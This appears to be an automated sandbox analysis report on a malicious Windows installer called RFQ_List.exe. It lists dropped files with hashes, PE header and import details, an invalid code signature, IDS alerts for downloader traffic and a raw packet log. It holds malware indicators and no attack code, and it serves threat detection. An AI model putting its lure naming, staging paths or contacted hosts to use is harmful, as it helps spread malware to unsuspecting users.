SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\cellulomonas.irr

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	data
Category:	dropped
Size (bytes):	346239
Entropy (8bit):	1.256262494072881
Encrypted:	false
SSDEEP:	768:qYE4EutdtNCCqpy382u5rGwJOshbFbQlixw8Y6T58VWS1HGuP8kPA7cBBjEaqKJJ:BtZ5iUEABbp5d1eWZK0KUN
MD5:	BFE4500D057A2BCEB674FBE3BF3687B1
SHA1:	547D5412301FC11E8BB858D1B4C34D3457DF0F24
SHA-256:	9AE45133F71521E61777D1A3A507AADB6C3808588D0E7632A02D1EE0EAD48CA9
SHA-512:	F963F860CC7A4BAF89C726D738CA2B93227D77297AFB5BA70533C6E454B5D8DA81725745C97480DF2818D26CEB7F6443D30B0022BEFB3E9FF05DFB248BE0A5FB
Malicious:	false
Preview:	...~........................................................................O.........!.........................K.U........].........................Gz........................................j................\.................."..................N..............................................y.................r.........................2.............C....h..................h..................=......e..7.........~..............G...................................................e..................................2.............................................N....................I*............../..........................................................................w.........................................................y....................z.....................................L........Z.....................................G................................................o............................................'.................................5.........G.....i..........i......

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\eskimologens.for

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	data
Category:	dropped
Size (bytes):	400431
Entropy (8bit):	1.2528029962595542
Encrypted:	false
SSDEEP:	768:NNxZ+39Fm6bVPJacZnq1T2m6o9dla/C1Y5xxD1w/o2ROgMK7vOqj8zumcicsqXxQ:NmE6R3zvZAhiZq+Nm6pLVawSgc8Cke2
MD5:	7B99EB8E7148F8C420E09FB360215B97
SHA1:	0D6B5053DAC5CA692217DBE9B0800316CC0E5C42
SHA-256:	84FBD7F281D8B3631200E264351545FA1DC2C256367B83A2CD0EBEB2E1A884B2
SHA-512:	B09C75B1271086763AB863FB8A755B688E48CA46A97550A651125217C27B9801EE2ED6DE65F912FCE3793E3FBF24063857F81F1473EB21ED76267A435C0AF57B
Malicious:	false
Preview:	.......n...........................................................^.........................P.................................J........................................................................*...............E........................................H...................0.............................2..........................................7..................................................-......................................................A................................................................................}..........v......v..........3..........6..................i..........\|...................$.............h............'.........................y...W.9.....................8.....................................................................6...................X.....................................................6................o....................................................y......[.........b.........................p..................................

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\lila.bes

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	data
Category:	dropped
Size (bytes):	283523
Entropy (8bit):	1.2517647181496547
Encrypted:	false
SSDEEP:	768:Vp4oNJKrnvbCN/KeYxLJF9VPGsNo8E2FPOd9gkdLGcY3M/C+KLtbEEmDi4YxK8JY:U3nVkUc/9T+47K8
MD5:	1EAEC618F4CEE65603DBC98CC4ACFFD5
SHA1:	7C57A1E9E3E8A87CDAC4279C9CD1F48921AFD3E5
SHA-256:	BAFBD7BA6E116FA4621416AFFA402B5E77BD3EC8A1CD6883B86B2500ED32236F
SHA-512:	4892B80B2F1F3ECC2E3940928F7220B601057B1CB6EADFB2EDDAB1B330966663627C1AE87B3D8C47576A5861422C7906E297C4F11FC18A1DC332559B74B24389
Malicious:	false
Preview:	..............5.................A.....................................M..............................V...........................~..................................................... .......=...6..............................n......l.............w........P....................F..+............-..............w.........1............H......\|.................@..........E..........................................................`......]....................]..........................G...........w...........................o...................../.......................................................a..............V........................................................................w.k................................../............................................J....................p.....................................l..........o....................a.........................RS........................,..S...............l.................................................L.H..............

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\onomatopoeical.kri

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	data
Category:	dropped
Size (bytes):	226967
Entropy (8bit):	1.2523842479629557
Encrypted:	false
SSDEEP:	768:3AGAEvmWSP+6MQhb59DUem6F2X8dzV+Z8+r0aFk7yShqxG9m6VA2fALEOoWU4/yz:rcteBv2Xmd6
MD5:	5E418394A6BDD607FD99936B606B16B6
SHA1:	AA66F3F103B9E6026D17726DE083834957022433
SHA-256:	503C8736545D2B5612D84243FC79FDEAB9DA98ACF6E936D18E5755236EDF79B5
SHA-512:	184528AC2000AE86037E954C3A0CFA45EDD4E0789A4F940F9AC5C6750EFA416BF71FB8533FF3F14C3C746F329FA4B29F998F8080F4D904168A2A175005D04BDD
Malicious:	false
Preview:	.........................._..;...........................].....................................................B............e...m...........(....U.......................................W............................................N.............................................................................................8..............................................................................................R.........$.....'.................i....................................................................b......#............n.............................;p.......g..........X..:.e.............................N........b.0...........P.............s..............................................................................................V......1.............................x............................J....H................X..............)...........................................Q.........................................F..........}.%..................................

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\pantomimer.sek

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	data
Category:	dropped
Size (bytes):	351531
Entropy (8bit):	1.255004735349448
Encrypted:	false
SSDEEP:	768:vtnDa/EP5kFIQ50d2qgSXrNKj6kg7pqCdYWGcZHmfxNLVMdLTmzCfYCt08fLGL84:B969AOqGVMp9iFwBzg7gnwf
MD5:	4C4AE3CA611575271974D70E3165CA94
SHA1:	B645FF20978B7B3F88F590851CE0ED3E22B9DF03
SHA-256:	CC86D299F6A01B3278E6ABD5DA639588B0B7FBF0043A6BADFEF3DA29320DC762
SHA-512:	F39F08DB7527B8190407B4D4209201261E7C91531CB8CF1BB03EA3AAD86AA913CBEA6B28629F1C5BD69FF51E1BF7A11F4E9393E41FE44062199E2B875BE83FCA
Malicious:	false
Preview:	........................................................................................................................................................A........P.............................~.......................................l.............4............................................1...............s..............K.......m.......................................................;.......z.............s.................K.................-........................T......3.........6............................................U.....:.......~................................l......................=...../.....D...2..........3...p.......................P..................................m......................b..l................K...................................`.........../.....W................#.................!......................................................}...,........@...............g...C..................P..................................(...........6....................W.

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\semianimate.pol

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	dBase IV DBT, block length 2560, next free block index 21, next free block 0, next used block 0
Category:	dropped
Size (bytes):	252461
Entropy (8bit):	1.2493375868406968
Encrypted:	false
SSDEEP:	768:AykHXFrLko/QFYJsdiqVC2S0lkhrBqTu1zfsknvSZ4os5np88nXHosXKHUGR0QrH:GH1/yDPtU0S+kg4n0m6Xzp/1HDaIP
MD5:	010EE4F1EE9C180B89D1C3E930374CBA
SHA1:	BF2033E8D13926314B9EA776AA3FB95B72D6E118
SHA-256:	9F10777AE5FE6CBB11DDDAAC3F5DD7A7F46D7B27D8D1C78BAD1286DDA9602518
SHA-512:	ABEC8E837435B7086D71C13E923D30B095A6411DE7D4B3C1984754896F8993EF93F68B700D034A35E9D8ABEDF48FF33FDC9F02B2B55027042B8F27A602DE774A
Malicious:	false
Preview:	..............?...................D.......\.&..........................N...............................{.....................................G................................o.......(..........\|................................D..............X.......................................................h....................................................................................................0..........g..B........../...................................................................................................)......................................................t.............a..........z...........g......................t...............I...S.............................................~....4.................................................x..................................................................................=.J...................................................................................e............................4.........M................................

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\bekrigelsers.tai

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	data
Category:	dropped
Size (bytes):	332313
Entropy (8bit):	1.2524630814549833
Encrypted:	false
SSDEEP:	1536:yaaIh+D2s7piRwb32b8giA7tquM42GdILYfRs/:ODj/VRDGyG
MD5:	9344CE0FFA5CDEE95A7D4ACB69316358
SHA1:	5F11CB1D4489ECE30229257AD648225BE9E27E1A
SHA-256:	F11224BF4988F3E5365402ADACDBEDC70D0732B35F7284E1D1C9076D09076D43
SHA-512:	943C8EE246D047AE8A0D3BA472FF991983502C678EF942269D87CEECBFFBE39011F0ADBAE209BB961D93B0C5A3254B2D2556B68FC794946E830AE66E867E598E
Malicious:	false
Preview:	............................SA1...............................".............................f............u.0..............................................C.......<..]...................................f..........................\|.........................................&.....i.......................3.......F....................................................................'...........O..............].............................P..........................................................................................................................................................................................u..........................s......................_...............#............n...$..............x..j......r...........\|...._...............................................V.f...._...................s..........................................R.................................................W...........................n....................................I....................

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\campagnol.txt

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	353
Entropy (8bit):	4.211689964548391
Encrypted:	false
SSDEEP:	6:KhOMxEWb6aDKp8Wwoi/fAutuGIlKtXZsm1CLMQIbpW4mLWwPx2jJ:ADuakwDvEr2ZsQEnwwPx2jJ
MD5:	C1C6D8511B3FBE94F744DF9BA827D18D
SHA1:	B3EFA90BE122251E4267FDDB7BB6ADCCFDDDC958
SHA-256:	A54B603B2BEE75BCF8A30C6C4634C3DFA78B512739D0D5FAE84FF2262686E0A8
SHA-512:	C9D1A502B259B93B11850CC8901F15D19F591CE67B0E8268E414A332A5A7C50667F7FB41526C5265EE7735D77F6D3C160C0DE29B84FF87250CAC6D611E1D46CC
Malicious:	false
Preview:	chollers lynett fimreceller opklodset hexagrams carrier mandorla mumblebee..ugudelighedernes ennoblements kluntemikkelen dekretere.hierarchized testosteronet vandrefuglens paasknnelsers eneboerskernes jumping,aflush argosies pinds nonelementary calciner,nul efficacies samkvemsretten isuridae driftsomkostningerne,espier subauriculate skospnders dorere,

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Pedanter.Dou

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	data
Category:	dropped
Size (bytes):	328191
Entropy (8bit):	7.651306886535396
Encrypted:	false
SSDEEP:	6144:WMLMwjW47RsLO+ms0jD4jKLBrEDgzwB4/Tyf2D8XIJlGv2:NLRW4i6+p0H4OiDgzwC/TekGIvGO
MD5:	489A9469B8457A7DAD8C174D89221366
SHA1:	52DA5892B83416D9328EEC4A15B5C217EE08C1F0
SHA-256:	B150F922D2266E7E99C0FC7E5AA565BECC5671DAEA479980B741ADC1D99B2BE2
SHA-512:	C788BF86225C25DF3C4020012D38A68CF107BFEB18B7C43ADF20E2969C9CF35BD2E959DD8C67337DFED2FB677ECB749E6D9634F0B5CAA548F10971C4295E2473
Malicious:	false
Preview:	....;...................:...,,,...............pp.(.................b.NN.....kkkk........;......C.............d........q.G....+...............f...hh...~..............z......A.......``.......QQQQQ.r.s..........u...........HHH............nn............B.........LL..........0000.................;;;;.......<<.8.....WW..LLL...........33........''.uuu.)).......~...........................kk..KK.X.......33...........................c...hhhh.......................p..O.'............tt.....l...JJ............................u.k.!.~~~~...00........(.II.........................................=..www......n..........0.......~...........NN.///.........}...gg....^...........................xx....44...................]]]]]..............m.............._...............^^....y........--.[............oo...................hhh.WWW.g........................................####...................g......ii............v.........................yy.................{{...>>>>....]]].......,,,.........................

C:\Windows\Resources\Nebengeschfter.ini

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	3.8431390622295662
Encrypted:	false
SSDEEP:	3:TLCJR1EHX0Ctyn:TLA1MUn
MD5:	53898E643BD3E0CA22A462325AD62DA4
SHA1:	E0F08A75FA5219F39E49C1B9F361119905DA7D02
SHA-256:	B947991000AEA669EBFEADFB12DE45121D46AD3DFD02296F373F9BF8CE4F1AFF
SHA-512:	AA17B99A93A04F7BBBB92F34C15921DA80E20592A39B3921F1D3CC59FAE55F66196B2BE4F56716846DAFF041253CB63D7E373B84234D451181C87F1D097FE8CA
Malicious:	false
Preview:	[sprnglrd]..allis=tarsadenitis..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.8603182914839635
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RFQ_List.exe
File size:	927'736 bytes
MD5:	27393ac93e0c60c934afa5ccdfc7c529
SHA1:	e1989ce514efd53819be62e8aa4c51975da0b3e0
SHA256:	66f7ca7287b5118119d8e6b8d55222d7662da16c12345a6122a28b64702ae69b
SHA512:	672583e3937f3f5f5e84843913da032d5f6d6d32c759758e37710dff340973f9f0c77fb8f5b7b176b26edddec5851aa4902deb103b277b7403ea57d88292b438
SSDEEP:	24576:dbusrIDaWLwBhB9XE/2D6lm7Pytae6/B1GX:SX8zB9XQ2gm7OjGB1GX
TLSH:	01152361E398C867DC6116B28827D86968F6FC6985B14D4F332F3719EA33302653F94B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........

File Icon


Icon Hash:	1130233367c3e313

Static PE Info

General

Entrypoint:	0x4032a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d4b94e8ee3f620a89d114b9da4b31873

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Recriticises, O=Recriticises, L=Soldier, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	07/03/2024 01:40:39 07/03/2027 01:40:39
Subject Chain	CN=Recriticises, O=Recriticises, L=Soldier, C=US
Version:	3
Thumbprint MD5:	98573B9330068AEDB04ECFF4E202481E
Thumbprint SHA-1:	17DA9433FF10A2B2720362F4E40834A52FED9116
Thumbprint SHA-256:	8450E43FAC09732749132875E06A5977249235647F6E53C9A39369145577AD71
Serial:	1C8996D9F8EF526438F303839B42156814F40758

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 0040A300h
mov dword ptr [esp+18h], ebp
call dword ptr [004080B0h]
call dword ptr [004080ACh]
cmp ax, 00000006h
je 00007F6F58E7A3D3h
push ebp
call 00007F6F58E7D516h
cmp eax, ebp
je 00007F6F58E7A3C9h
push 00000C00h
call eax
push ebx
push edi
push 0040A2F4h
call 00007F6F58E7D493h
push 0040A2ECh
call 00007F6F58E7D489h
push 0040A2E0h
call 00007F6F58E7D47Fh
push 00000009h
call 00007F6F58E7D4E4h
push 00000007h
call 00007F6F58E7D4DDh
mov dword ptr [00434F04h], eax
call dword ptr [00408044h]
push ebp
call dword ptr [004082A8h]
mov dword ptr [00434FB8h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 0042B228h
call dword ptr [0040818Ch]
push 0040A2C8h
push 00433F00h
call 00007F6F58E7D0CAh
call dword ptr [004080A8h]
mov ebx, 0043F000h
push eax
push ebx
call 00007F6F58E7D0B8h
push ebp
call dword ptr [00408178h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x85c8	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x71000	0x1e308	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xe1ef0	0x908
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x637c	0x6400	83ff228d6dae8dd738eb2f78afbc793f	False	0.672421875	data	6.491609540807675	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x147c	0x1600	d9f9b0b330e238260616b62a7a3cac09	False	0.42933238636363635	data	4.973928345594701	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2aff8	0x600	3f2b05c8fbb8b2e4c9c89e93d30e7252	False	0.53125	data	4.133631086111171	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x3c000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x71000	0x1e308	0x1e400	24942564d8bf1d8e057f4addfed688e9	False	0.4605258910123967	data	6.06487438837818	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x71358	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x716c0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.20474979297290902
RT_ICON	0x81ee8	0x864f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9821423377832068
RT_ICON	0x8a538	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.366804979253112
RT_ICON	0x8cae0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4129924953095685
RT_ICON	0x8db88	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5221311475409836
RT_ICON	0x8e510	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.598404255319149
RT_DIALOG	0x8e978	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x8eac0	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0x8ec00	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x8ed20	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x8ee40	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x8ef08	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x8ef68	0x5a	data	English	United States	0.7888888888888889
RT_MANIFEST	0x8efc8	0x33f	XML 1.0 document, ASCII text, with very long lines (831), with no line terminators	English	United States	0.5547533092659447

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-28T06:47:14.901287+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	51907	142.250.185.206	443	TCP
2024-10-28T06:47:20.831783+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	51943	158.101.44.242	80	TCP
2024-10-28T06:47:22.066174+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	51943	158.101.44.242	80	TCP
2024-10-28T06:47:23.845919+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	51960	188.114.97.3	443	TCP
2024-10-28T06:47:24.496127+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	51966	158.101.44.242	80	TCP
2024-10-28T06:47:32.234588+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52015	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 06:47:13.589226961 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:13.589307070 CET	443	51907	142.250.185.206	192.168.2.4
Oct 28, 2024 06:47:13.589523077 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:13.604381084 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:13.604418993 CET	443	51907	142.250.185.206	192.168.2.4
Oct 28, 2024 06:47:14.481179953 CET	443	51907	142.250.185.206	192.168.2.4
Oct 28, 2024 06:47:14.481271982 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:14.482253075 CET	443	51907	142.250.185.206	192.168.2.4
Oct 28, 2024 06:47:14.482321978 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:14.533207893 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:14.533258915 CET	443	51907	142.250.185.206	192.168.2.4
Oct 28, 2024 06:47:14.534138918 CET	443	51907	142.250.185.206	192.168.2.4
Oct 28, 2024 06:47:14.535890102 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:14.539028883 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:14.579339027 CET	443	51907	142.250.185.206	192.168.2.4
Oct 28, 2024 06:47:14.901321888 CET	443	51907	142.250.185.206	192.168.2.4
Oct 28, 2024 06:47:14.901388884 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:14.901416063 CET	443	51907	142.250.185.206	192.168.2.4
Oct 28, 2024 06:47:14.901463032 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:14.901608944 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:14.901695967 CET	443	51907	142.250.185.206	192.168.2.4
Oct 28, 2024 06:47:14.901767969 CET	51907	443	192.168.2.4	142.250.185.206
Oct 28, 2024 06:47:14.936290979 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:14.936371088 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:14.936459064 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:14.936691046 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:14.936727047 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:16.121784925 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:16.121887922 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:16.128745079 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:16.128791094 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:16.129159927 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:16.129223108 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:16.129894972 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:16.171361923 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:18.926270962 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:18.926371098 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:18.934382915 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:18.934439898 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.042498112 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.042563915 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.042593002 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.042665958 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.042850971 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.042900085 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.042953968 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.043000937 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.045691967 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.045741081 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.045763016 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.045818090 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.050034046 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.050081968 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.050096035 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.050146103 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.058743954 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.058796883 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.058809996 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.058856010 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.067560911 CET	443	51917	172.217.16.193	192.168.2.4
